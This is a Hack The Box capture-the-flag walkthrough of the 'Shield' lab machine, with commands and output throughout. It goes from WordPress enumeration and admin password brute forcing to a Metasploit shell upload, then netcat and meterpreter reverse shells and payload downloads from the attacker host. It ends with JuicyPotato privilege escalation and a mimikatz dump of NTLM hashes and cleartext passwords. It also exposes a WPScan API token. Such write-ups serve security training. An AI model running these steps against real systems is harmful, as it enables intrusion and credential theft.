Shield
HTB - Shield
nmap -T4 -A -p- 10.10.10.29
kali@kali:~$ nmap -T4 -A -p- 10.10.10.29 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 17:10 EDT Nmap scan report for 10.10.10.29 Host is up (0.47s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 3306/tcp open mysql MySQL (unauthorized) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 643.75 seconds
Nessus scan for fun Start with
sudo /etc/init.d/nessusd start
and go tohttps://kali:8834
Enumerate HTTP
Ran
sudo nikto -h http://10.10.10.29
kali@kali:~$ sudo nikto -h http://10.10.10.29 [sudo] password for kali: - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.29 + Target Hostname: 10.10.10.29 + Target Port: 80 + Start Time: 2020-05-04 17:16:16 (GMT-4) --------------------------------------------------------------------------- + Server: Microsoft-IIS/10.0 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST + 7863 requests: 0 error(s) and 5 item(s) reported on remote host + End Time: 2020-05-04 18:12:15 (GMT-4) (3359 seconds) --------------------------------------------------------------------------- + 1 host(s) tested kali@kali:~$ sudo nikto -h http://10.10.10.29/wordpress [sudo] password for kali: - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.29 + Target Hostname: 10.10.10.29 + Target Port: 80 + Start Time: 2020-05-04 18:41:32 (GMT-4) --------------------------------------------------------------------------- + Server: No banner retrieved + Retrieved x-powered-by header: PHP/7.1.29 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'link' found, with multiple values: (<http://10.10.10.29/wordpress/index.php/wp-json/>; rel="https://api.w.org/",<http://10.10.10.29/wordpress/>; rel=shortlink,) + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Uncommon header 'x-redirect-by' found, with contents: WordPress + No CGI Directories found (use '-C all' to force check all possible dirs) + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST + ERROR: Error limit (20) reached for host, giving up. Last error: + Scan terminated: 3 error(s) and 8 item(s) reported on remote host + End Time: 2020-05-04 19:11:11 (GMT-4) (1779 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Subdirectory brute force with gobuster:
gobuster dir -u http://10.10.10.29/ -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
(other possible wordlist:/usr/share/wordlists/dirb/common.txt
)=============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.29/ [+] Threads: 200 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/05/04 17:27:45 Starting gobuster =============================================================== /wordpress (Status: 301) [ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/people: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/aboutus: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/new: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/sports: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/buttons: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/image: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/blogs: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/products: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/events: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/music: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:28:12 [!] Get http://10.10.10.29/474: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:28:12 [!] Get http://10.10.10.29/Top: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:28:13 [!] net/http: request canceled (Client.Timeout exceeded while reading body) [ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/Logos: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/infobox: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/994: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/777: net/http: request canceled (Client.Timeout exceeded while awaiting headers) [ERROR] 2020/05/04 17:28:16 [!] Get http://10.10.10.29/su: net/http: request canceled (Client.Timeout exceeded while awaiting headers) /WordPress (Status: 301) [ERROR] 2020/05/04 17:30:21 [!] Get http://10.10.10.29/category3: net/http: request canceled (Client.Timeout exceeded while awaiting headers) /Wordpress (Status: 301) =============================================================== 2020/05/04 17:34:53 Finished ===============================================================
Wordpress install found at
/wordpress/
Run
wpscan
:wpscan --update wpscan --url 10.10.10.29/wordpress/ --api-token 4emjktvbV4Csl9u9IVTpH5uWcnXvgwJZfWSCSlu0s3g
Output:
_______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.1 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://10.10.10.29/wordpress/ [10.10.10.29] [+] Started: Mon May 4 17:38:24 2020 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Microsoft-IIS/10.0 | - X-Powered-By: PHP/7.1.29 | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://10.10.10.29/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://10.10.10.29/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://10.10.10.29/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21). | Found By: Rss Generator (Passive Detection) | - http://10.10.10.29/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator> | - http://10.10.10.29/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator> | | [!] 18 vulnerabilities identified: | | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation | Fixed in: 5.2.3 | References: | - https://wpvulndb.com/vulnerabilities/9867 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222 | - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/ | - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68 | - https://hackerone.com/reports/339483 | | [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews | Fixed in: 5.2.3 | References: | - https://wpvulndb.com/vulnerabilities/9864 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219 | - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/ | - https://fortiguard.com/zeroday/FG-VD-18-165 | - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html | | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer | Fixed in: 5.2.4 | References: | - https://wpvulndb.com/vulnerabilities/9908 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts | Fixed in: 5.2.4 | References: | - https://wpvulndb.com/vulnerabilities/9909 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308 | - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/ | | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags | Fixed in: 5.2.4 | References: | - https://wpvulndb.com/vulnerabilities/9910 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning | Fixed in: 5.2.4 | References: | - https://wpvulndb.com/vulnerabilities/9911 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation | Fixed in: 5.2.4 | References: | - https://wpvulndb.com/vulnerabilities/9912 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2 | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation | Fixed in: 5.2.4 | References: | - https://wpvulndb.com/vulnerabilities/9913 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675 | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/ | - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0 | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html | | [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API | Fixed in: 5.2.5 | References: | - https://wpvulndb.com/vulnerabilities/9973 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788 | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw | | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links | Fixed in: 5.2.5 | References: | - https://wpvulndb.com/vulnerabilities/9975 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773 | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/ | - https://hackerone.com/reports/509930 | - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7 | | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content | Fixed in: 5.2.5 | References: | - https://wpvulndb.com/vulnerabilities/9976 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780 | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v | | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass | Fixed in: 5.2.5 | References: | - https://wpvulndb.com/vulnerabilities/10004 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041 | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/ | - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53 | | [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated | Fixed in: 5.2.6 | References: | - https://wpvulndb.com/vulnerabilities/10201 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027 | - https://wordpress.org/news/2020/04/wordpress-5-4-1/ | - https://core.trac.wordpress.org/changeset/47634/ | - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw | | [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts | Fixed in: 5.2.6 | References: | - https://wpvulndb.com/vulnerabilities/10202 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028 | - https://wordpress.org/news/2020/04/wordpress-5-4-1/ | - https://core.trac.wordpress.org/changeset/47635/ | - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w | | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer | Fixed in: 5.2.6 | References: | - https://wpvulndb.com/vulnerabilities/10203 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025 | - https://wordpress.org/news/2020/04/wordpress-5-4-1/ | - https://core.trac.wordpress.org/changeset/47633/ | - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c | | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Search Block | Fixed in: 5.2.6 | References: | - https://wpvulndb.com/vulnerabilities/10204 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11030 | - https://wordpress.org/news/2020/04/wordpress-5-4-1/ | - https://core.trac.wordpress.org/changeset/47636/ | - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-vccm-6gmc-qhjh | | [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache | Fixed in: 5.2.6 | References: | - https://wpvulndb.com/vulnerabilities/10205 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029 | - https://wordpress.org/news/2020/04/wordpress-5-4-1/ | - https://core.trac.wordpress.org/changeset/47637/ | - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c | | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads | Fixed in: 5.2.6 | References: | - https://wpvulndb.com/vulnerabilities/10206 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026 | - https://wordpress.org/news/2020/04/wordpress-5-4-1/ | - https://core.trac.wordpress.org/changeset/47638/ | - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/ | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2 [i] The main theme could not be detected. [+] Enumerating All Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] mesmerize-companion | Location: http://10.10.10.29/wordpress/wp-content/plugins/mesmerize-companion/ | Latest Version: 1.6.111 | Last Updated: 2020-04-10T15:01:00.000Z | | Found By: Urls In Homepage (Passive Detection) | | The version could not be determined. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:04 <==============================================================================> (21 / 21) 100.00% Time: 00:00:04 [i] No Config Backups Found. [+] WPVulnDB API OK | Plan: free | Requests Done (during the scan): 2 | Requests Remaining: 48 [+] Finished: Mon May 4 17:38:40 2020 [+] Requests Done: 27 [+] Cached Requests: 36 [+] Data Sent: 6.36 KB [+] Data Received: 18.56 KB [+] Memory used: 175.391 MB [+] Elapsed time: 00:00:15
Enumerate Users:
wpscan --url 10.10.10.29/wordpress/ --enumerate u
[+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:30 <=============================================================================> (10 / 10) 100.00% Time: 00:00:30 [i] User(s) Identified: [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://10.10.10.29/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection)
Bruteforce login:
wpscan --url 10.10.10.29/wordpress/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin --max-threads 50 --api-token 4emjktvbV4Csl9u9IVTpH5uWcnXvgwJZfWSCSlu0s3g
Login found to be
admin:P@s5w0rd!
from last box. Go tohttp://10.10.10.29/wordpress/wp-login.php
and login.Searching for
metasploit wordpress
yields https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload
Exploit
sudo msfconsole msf > use exploit/unix/webapp/wp_admin_shell_upload msf > set PASSWORD P@s5w0rd! msf > set USERNAME admin msf > set TARGETURI /wordpress msf > set RHOSTS 10.10.10.29 msf > set LPORT 443 msf > set payload php/meterpreter_reverse_tcp msf > exploit
Upgrade to more stable shell:
wget https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip untar netcat-win32-1.12.zip msf > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads sudo python3 -m http.server 80 msf > shell > iwr -outf nc.exe http://10.10.14.173/nc.exe nc -lvp 1234 msf > execute -f nc.exe -a "-e cmd.exe 10.10.14.173 1234"
2nd way to upgrade (much better):
Change paylaod to download and execute
set payload php/download_exec msf > set url http://10.10.14.173/shell.exe
Create exploit:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.173 LPORT=443 -f exe > shell.exe
Run server:
sudo python3 -m http.server 80
Open up port to listen on:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp options set LHOST 10.10.15.117 set LPORT 443 run
Sysinfo:
sysinfo Computer : SHIELD OS : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586 Meterpreter : php/windows
Privilege Escalation (Great Tutorial for Windows)
Find exploit:
Method 1: Priv esc suggester
search suggester use 0 options set session 1 run
Result:
0.29 - Collecting local exploits for x86/windows... [*] 10.10.10.29 - 30 exploit checks are being tried... [+] 10.10.10.29 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated. [+] 10.10.10.29 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.29 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. [*] Post module execution completed
Result: I tried
ms16_032_secondary_logon_handle_privesc
withx64
meterpreter after changing tox64
shell from32 bit
but did not work.Method 2: Search for
windows server 2016 privilege escalation exploit
yields https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#juicy-potato-abusing-the-golden-privileges which points to ohpe/juicy-potatoMethod 3: More automated searchers. **
sherlock
byrastamouse
sudo python3 -m http.server 80 msf shell > certutil -urlcache -f http://10.10.15.117/sher.ps1 sher.ps1 msf shell > powershell.exe -exec bypass -Command "& {Import-Module .\sher.ps1; Find-AllVulns}"
Output:
Title : User Mode to Ring (KiTrap0D) MSBulletin : MS10-015 CVEID : 2010-0232 Link : https://www.exploit-db.com/exploits/11199/ VulnStatus : Not supported on 64-bit systems Title : Task Scheduler .XML MSBulletin : MS10-092 CVEID : 2010-3338, 2010-3888 Link : https://www.exploit-db.com/exploits/19930/ VulnStatus : Not Vulnerable Title : NTUserMessageCall Win32k Kernel Pool Overflow MSBulletin : MS13-053 CVEID : 2013-1300 Link : https://www.exploit-db.com/exploits/33213/ VulnStatus : Not supported on 64-bit systems Title : TrackPopupMenuEx Win32k NULL Page MSBulletin : MS13-081 CVEID : 2013-3881 Link : https://www.exploit-db.com/exploits/31576/ VulnStatus : Not supported on 64-bit systems Title : TrackPopupMenu Win32k Null Pointer Dereference MSBulletin : MS14-058 CVEID : 2014-4113 Link : https://www.exploit-db.com/exploits/35101/ VulnStatus : Not Vulnerable Title : ClientCopyImage Win32k MSBulletin : MS15-051 CVEID : 2015-1701, 2015-2433 Link : https://www.exploit-db.com/exploits/37367/ VulnStatus : Not Vulnerable Title : Font Driver Buffer Overflow MSBulletin : MS15-078 CVEID : 2015-2426, 2015-2433 Link : https://www.exploit-db.com/exploits/38222/ VulnStatus : Not Vulnerable Title : 'mrxdav.sys' WebDAV MSBulletin : MS16-016 CVEID : 2016-0051 Link : https://www.exploit-db.com/exploits/40085/ VulnStatus : Not supported on 64-bit systems Title : Secondary Logon Handle MSBulletin : MS16-032 CVEID : 2016-0099 Link : https://www.exploit-db.com/exploits/39719/ VulnStatus : Not Vulnerable Title : Windows Kernel-Mode Drivers EoP MSBulletin : MS16-034 CVEID : 2016-0093/94/95/96 Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1 6-034? VulnStatus : Not Vulnerable Title : Win32k Elevation of Privilege MSBulletin : MS16-135 CVEID : 2016-7255 Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S ample-Exploits/MS16-135 VulnStatus : Not Vulnerable Title : Nessus Agent 6.6.2 - 6.10.3 MSBulletin : N/A CVEID : 2017-7199 Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h tml VulnStatus : Not Vulnerable
Result: Not vulnerable
Trying pentestmonkey/windows-privesc-check:
wget https://github.com/pentestmonkey/windows-privesc-check/raw/master/windows-privesc-check2.exe sudo python3 -m http.server 80 msf shell > certutil -urlcache -f http://10.10.15.117/windows-privesc-check2.exe ex.exe msf shell > ex.exe --audit -a -o report -v
Trying 411Hall/JAWS:
wget https://github.com/411Hall/JAWS/raw/master/jaws-enum.ps1 sudo python3 -m http.server 80 msf shell > certutil -urlcache -f http://10.10.15.117/jaws-enum.ps1 jaws.ps1 msf shell > powershell.exe -ExecutionPolicy Bypass -File .\jaws.ps1 msf shell > execute -f powershell.exe -a "-ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt"
"Juicy Potato is a variant of the exploit that allows service accounts on Windows to escalate to SYSTEM (highest privileges) by leveraging the BITS and the
SeAssignPrimaryToken
orSeImpersonate
privilege in a MiTM attack."CLSID List: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard
Manual Escalation
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe sudo python3 -m http.server 80 msf > shell msf > powershell msf > iwr -outf js.exe http://10.10.14.173/JuicyPotato.exe
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.173 1111 > shell.bat js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337 -c {FFE1E5FE-F1F0-48C8-953E-72BA272F2744}
Automatic Escalation
msf > background msf > search ms16_075 msf > use exploit/windows/local/ms16_075_reflection_juicy msf > set payload windows/meterpreter/reverse_tcp msf > set session 1 msf > set lhost 10.10.14.173 msf > set dcom_port 1337 msf > set CLSID {FFE1E5FE-F1F0-48C8-953E-72BA272F2744} msf > set lport 8464 msf > run
Result:
Server username: NT AUTHORITY\SYSTEM
cd C:\Users\Administrator\Desktop cat root.txt
Root Flag:
6e9a9fdc6f64e410a68b847bb4b404fa
Post Exploitation
Convert to x64 shell:
use post/windows/manage/archmigrate set session 2 set IGNORE_SYSTEM true
Get passwords
load kiwi meterpreter > kiwi_cmd sekurlsa::logonpasswords
Output:
Authentication Id : 0 ; 298603 (00000000:00048e6b) Session : Interactive from 1 User Name : sandra Domain : MEGACORP Logon Server : PATHFINDER Logon Time : 5/4/2020 10:20:27 PM SID : S-1-5-21-1035856440-4137329016-3276773158-1105 msv : [00000003] Primary * Username : sandra * Domain : MEGACORP * NTLM : 29ab86c5c4d2aab957763e5c1720486d * SHA1 : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38 * DPAPI : f4c73b3f07c4f309ebf086644254bcbc tspkg : wdigest : * Username : sandra * Domain : MEGACORP * Password : (null) kerberos : * Username : sandra * Domain : MEGACORP.LOCAL * Password : Password1234! ssp : credman : Authentication Id : 0 ; 183955 (00000000:0002ce93) Session : Service from 0 User Name : DefaultAppPool Domain : IIS APPPOOL Logon Server : (null) Logon Time : 5/4/2020 10:19:24 PM SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 msv : [00000003] Primary * Username : SHIELD$ * Domain : MEGACORP * NTLM : 9d4feee71a4f411bf92a86b523d64437 * SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da tspkg : wdigest : * Username : SHIELD$ * Domain : MEGACORP * Password : (null) kerberos : * Username : SHIELD$ * Domain : MEGACORP.LOCAL * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE& ssp : credman : Authentication Id : 0 ; 183792 (00000000:0002cdf0) Session : Service from 0 User Name : wordpress Domain : IIS APPPOOL Logon Server : (null) Logon Time : 5/4/2020 10:19:24 PM SID : S-1-5-82-698136220-2753279940-1413493927-70316276-1736946139 msv : [00000003] Primary * Username : SHIELD$ * Domain : MEGACORP * NTLM : 9d4feee71a4f411bf92a86b523d64437 * SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da tspkg : wdigest : * Username : SHIELD$ * Domain : MEGACORP * Password : (null) kerberos : * Username : SHIELD$ * Domain : MEGACORP.LOCAL * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE& ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : SHIELD$ Domain : MEGACORP Logon Server : (null) Logon Time : 5/4/2020 10:19:01 PM SID : S-1-5-20 msv : [00000003] Primary * Username : SHIELD$ * Domain : MEGACORP * NTLM : 9d4feee71a4f411bf92a86b523d64437 * SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da tspkg : wdigest : * Username : SHIELD$ * Domain : MEGACORP * Password : (null) kerberos : * Username : shield$ * Domain : MEGACORP.LOCAL * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE& ssp : credman : Authentication Id : 0 ; 995 (00000000:000003e3) Session : Service from 0 User Name : IUSR Domain : NT AUTHORITY Logon Server : (null) Logon Time : 5/4/2020 10:19:08 PM SID : S-1-5-17 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : IUSR * Domain : NT AUTHORITY * Password : (null) ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 5/4/2020 10:19:02 PM SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * 